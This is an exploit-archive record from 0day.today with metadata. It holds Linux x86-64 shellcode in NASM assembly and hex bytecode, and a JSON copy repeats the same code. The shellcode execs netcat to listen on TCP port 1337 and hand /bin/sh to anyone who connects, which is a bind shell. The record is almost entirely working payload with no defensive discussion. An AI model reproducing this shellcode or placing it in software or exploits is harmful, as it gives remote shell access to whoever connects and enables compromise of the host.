ID 1337DAY-ID-29510
Type zdt
Reporter Gaussillusion
Modified 2018-01-15T00:00:00
Description
Exploit for linux/x86-64 platform in category shellcode
; { Title: Shellcode linux/x86-64 bind-shell with netcat }
; Author : Gaussillusion
; Len : 131 bytes
; Language : Nasm
BITS 64
xor rdx,rdx
mov rdi,0x636e2f6e69622fff
shr rdi,0x08
push rdi
mov rdi,rsp
mov rcx,0x68732f6e69622fff
shr rcx,0x08
push rcx
mov rcx,rsp
mov rbx,0x652dffffffffffff
shr rbx,0x30
push rbx
mov rbx,rsp
mov r10,0x37333331ffffffff
shr r10,0x20
push r10
mov r10,rsp
mov r9,0x702dffffffffffff
shr r9,0x30
push r9
mov r9,rsp
mov r8,0x6c2dffffffffffff
shr r8,0x30
push r8
mov r8,rsp
push rdx ;push NULL
push rcx ;push address of 'bin/sh'
push rbx ;push address of '-e'
push r10 ;push address of '1337'
push r9 ;push address of '-p'
push r8 ;push address of '-l'
push rdi ;push address of '/bin/nc'
mov rsi,rsp
mov al,59
syscall
; _bytecode_start_
;\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63
;\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62
;\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51\x48\x89\xe1
;\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb
;\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33
;\x33\x37\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\x49\xb9
;\xff\xff\xff\xff\xff\xff\x2d\x70\x49\xc1\xe9\x30\x41
;\x51\x49\x89\xe1\x49\xb8\xff\xff\xff\xff\xff\xff\x2d
;\x6c\x49\xc1\xe8\x30\x41\x50\x49\x89\xe0\x52\x51\x53
;\x41\x52\x41\x51\x41\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
; _bytecode_end_
# 0day.today [2018-02-20] #
{"sourceData": "; { Title: Shellcode linux/x86-64 bind-shell with netcat }\r\n \r\n; Author : Gaussillusion\r\n; Len : 131 bytes\r\n; Language : Nasm\r\n \r\n \r\n \r\nBITS 64\r\nxor rdx,rdx\r\nmov rdi,0x636e2f6e69622fff\r\nshr rdi,0x08\r\npush rdi\r\nmov rdi,rsp\r\n \r\nmov rcx,0x68732f6e69622fff\r\nshr rcx,0x08\r\npush rcx\r\nmov rcx,rsp\r\n \r\nmov rbx,0x652dffffffffffff\r\nshr rbx,0x30\r\npush rbx\r\nmov rbx,rsp\r\n \r\nmov r10,0x37333331ffffffff\r\nshr r10,0x20\r\npush r10\r\nmov r10,rsp\r\n \r\nmov r9,0x702dffffffffffff\r\nshr r9,0x30\r\npush r9\r\nmov r9,rsp\r\n \r\nmov r8,0x6c2dffffffffffff\r\nshr r8,0x30\r\npush r8\r\nmov r8,rsp\r\n \r\npush rdx ;push NULL\r\npush rcx ;push address of 'bin/sh'\r\npush rbx ;push address of '-e'\r\npush r10 ;push address of '1337'\r\npush r9 ;push address of '-p'\r\npush r8 ;push address of '-l'\r\npush rdi ;push address of '/bin/nc'\r\n \r\nmov rsi,rsp\r\nmov al,59\r\nsyscall\r\n \r\n; _bytecode_start_\r\n;\\x48\\x31\\xd2\\x48\\xbf\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x6e\\x63\r\n;\\x48\\xc1\\xef\\x08\\x57\\x48\\x89\\xe7\\x48\\xb9\\xff\\x2f\\x62\r\n;\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xe9\\x08\\x51\\x48\\x89\\xe1\r\n;\\x48\\xbb\\xff\\xff\\xff\\xff\\xff\\xff\\x2d\\x65\\x48\\xc1\\xeb\r\n;\\x30\\x53\\x48\\x89\\xe3\\x49\\xba\\xff\\xff\\xff\\xff\\x31\\x33\r\n;\\x33\\x37\\x49\\xc1\\xea\\x20\\x41\\x52\\x49\\x89\\xe2\\x49\\xb9\r\n;\\xff\\xff\\xff\\xff\\xff\\xff\\x2d\\x70\\x49\\xc1\\xe9\\x30\\x41\r\n;\\x51\\x49\\x89\\xe1\\x49\\xb8\\xff\\xff\\xff\\xff\\xff\\xff\\x2d\r\n;\\x6c\\x49\\xc1\\xe8\\x30\\x41\\x50\\x49\\x89\\xe0\\x52\\x51\\x53\r\n;\\x41\\x52\\x41\\x51\\x41\\x50\\x57\\x48\\x89\\xe6\\xb0\\x3b\\x0f\\x05\r\n; _bytecode_end_\n\n# 0day.today [2018-02-20] #", "description": "Exploit for linux/x86-64 platform in category shellcode", "sourceHref": "https://0day.today/exploit/29510", "reporter": "Gaussillusion", "href": "https://0day.today/exploit/description/29510", "type": "zdt", "viewCount": 19, "references": [], "lastseen": "2018-02-20T05:29:16", "published": "2018-01-15T00:00:00", "cvelist": [], "id": "1337DAY-ID-29510", "modified": "2018-01-15T00:00:00", "title": "Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-02-20T05:29:16", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-20T05:29:16", "rev": 2}, "vulnersScore": -0.2}}
{}